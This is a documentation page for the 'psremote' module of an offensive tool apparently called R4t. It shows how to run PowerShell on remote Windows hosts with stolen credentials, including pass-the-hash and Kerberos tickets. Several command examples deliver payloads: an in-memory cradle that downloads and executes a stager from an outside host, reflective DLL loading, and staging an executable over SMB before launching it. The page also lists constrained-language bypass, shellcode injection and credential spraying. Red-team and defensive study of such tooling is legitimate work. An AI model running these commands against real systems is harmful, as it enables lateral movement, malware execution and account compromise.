psremote

The psremote command provides PowerShell Remoting operations for remote command execution, script delivery, and interactive sessions over WS-Management.

Usage

r4t psremote <subcommand> [flags]

Overview

PowerShell Remoting (PSRemote) is a protocol built on top of WS-Management (WinRM) that enables operators to execute PowerShell commands and scripts on remote Windows hosts. It operates over HTTP (port 5985) or HTTPS (port 5986) and is one of the most common administrative remote access methods in Windows enterprise environments. PSRemote is distinct from raw WinRM command execution — it provides a full PowerShell runspace on the remote host, enabling cmdlet execution, pipeline operations, and module loading that are not possible through basic cmd.exe execution.

Planned Capabilities

Capability	Description
Command Execution	Execute PowerShell commands on remote hosts
Script Execution	Run PowerShell script files (.ps1) remotely
Interactive Session	Establish an interactive PowerShell Remoting session
Constrained Language Bypass	Execute in Full Language Mode where possible
Module Loading	Import and execute PowerShell modules remotely

Authentication

PSRemote uses the same global authentication flags as all other R4t commands. The following authentication methods are supported:

Method	Flag	Description
Password	`-u` / `-p`	Domain username and password
NTLM Hash	`--hash`	Pass-the-hash via NT hash
Kerberos	`--aes` / `--ccache`	Kerberos authentication via AES key or ccache
Certificate (PFX)	`--pfx`	PFX certificate authentication
Certificate (PEM)	`--cert` / `--key`	PEM certificate and key authentication
Anonymous	`--anonymous`	Unauthenticated access

# Execute a PowerShell command
r4t psremote exec -u admin -p 'P@ssw0rd' -d corp.example.com 10.10.10.20 \
  "Get-Process | Select-Object -First 10"

# Run a script file
r4t psremote exec -u admin -p 'P@ssw0rd' -d corp.example.com 10.10.10.20 \
  -f ./enum-script.ps1

# Use NTLM hash authentication
r4t psremote exec -u admin --hash aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 \
  10.10.10.20 "whoami /all"

# Use Kerberos via ccache
r4t psremote exec --ccache /tmp/krb5cc_admin -d corp.example.com 10.10.10.20 \
  "Get-ADUser -Filter * | Select-Object Name, Enabled"

# Use stored credentials
r4t psremote exec --credential-id 1 10.10.10.20 "hostname"

Connection Details

Property	Value
Protocol	PowerShell Remoting over WS-Management
HTTP Port	5985
HTTPS Port	5986
Authentication	NTLM, Kerberos, Basic, Certificate
Remote Shell	Full PowerShell runspace
Access Group	Remote Management Users (RID 580)

Payload Execution via PSRemote

PSRemote is a primary execution channel for delivering payloads to remote hosts. Its PowerShell runspace enables both fileless in-memory execution and disk-based delivery.

Fileless Execution

# Download and execute in memory (cradle)
r4t psremote exec -u admin -p 'P@ssw0rd' -d corp.example.com 10.10.10.20 \
  "IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.5/stager.ps1')"

# Encoded command execution
r4t psremote exec -u admin -p 'P@ssw0rd' -d corp.example.com 10.10.10.20 \
  --encoded "<base64-encoded-powershell>"

# Reflective DLL loading via PowerShell
r4t psremote exec -u admin -p 'P@ssw0rd' -d corp.example.com 10.10.10.20 \
  "[System.Reflection.Assembly]::Load([Convert]::FromBase64String('<b64-dll>'))"

Disk-Based Execution

# Stage payload via SMB, execute via PSRemote
r4t smb put -u admin -p 'P@ssw0rd' -d corp.example.com 10.10.10.20 \
  ./payload.exe C:\Windows\Temp\svc.exe
r4t psremote exec -u admin -p 'P@ssw0rd' -d corp.example.com 10.10.10.20 \
  "Start-Process C:\Windows\Temp\svc.exe"

Payload Factory Integration

When the payload factory is operational, PSRemote execution modules will request artifacts by capability:

Capability Request	Use Case
`execution=script`, `type=ps1`	PowerShell stager for direct execution
`inmemory=true`, `execution=script`	Fileless execution via encoded PowerShell
`reflective=true`, `execution=reflective-load`	Reflective DLL loaded via `[Reflection.Assembly]::Load`
`execution=self-exec`, `os=windows`	Standard EXE executed after file transfer
`type=shellcode`, `inmemory=true`	Shellcode injected via PowerShell process injection

Remote Management Users (RID 580)

Access to PSRemote on a host is controlled by membership in the Remote Management Users local group (RID 580). By default, only members of this group (and local Administrators) can establish PowerShell Remoting sessions. This group is critical for attack path analysis — any user with Remote Management Users membership on a host can execute arbitrary PowerShell commands there.

Spray Integration

PSRemote credential validation can be tested through the WinRM spray protocol, since PSRemote operates over WinRM:

# Spray PSRemote/WinRM targets
r4t spray winrm 10.10.10.20 10.10.10.21

# Spray with stored users
r4t spray winrm --db-users --stop-on-lockout 10.10.10.20

winrm — Raw WinRM command execution (cmd.exe level)
wmi — WMI remote execution (alternative lateral movement)
smb — SMB file operations (payload staging)
spray — Multi-protocol credential spraying
bloodhound — BloodHound collection (includes psremote collection method)

commands

​psremote

​Usage

​Overview

​Planned Capabilities

​Authentication

​Connection Details

​Payload Execution via PSRemote

​Fileless Execution

​Disk-Based Execution

​Payload Factory Integration

​Remote Management Users (RID 580)

​Spray Integration

​Related Commands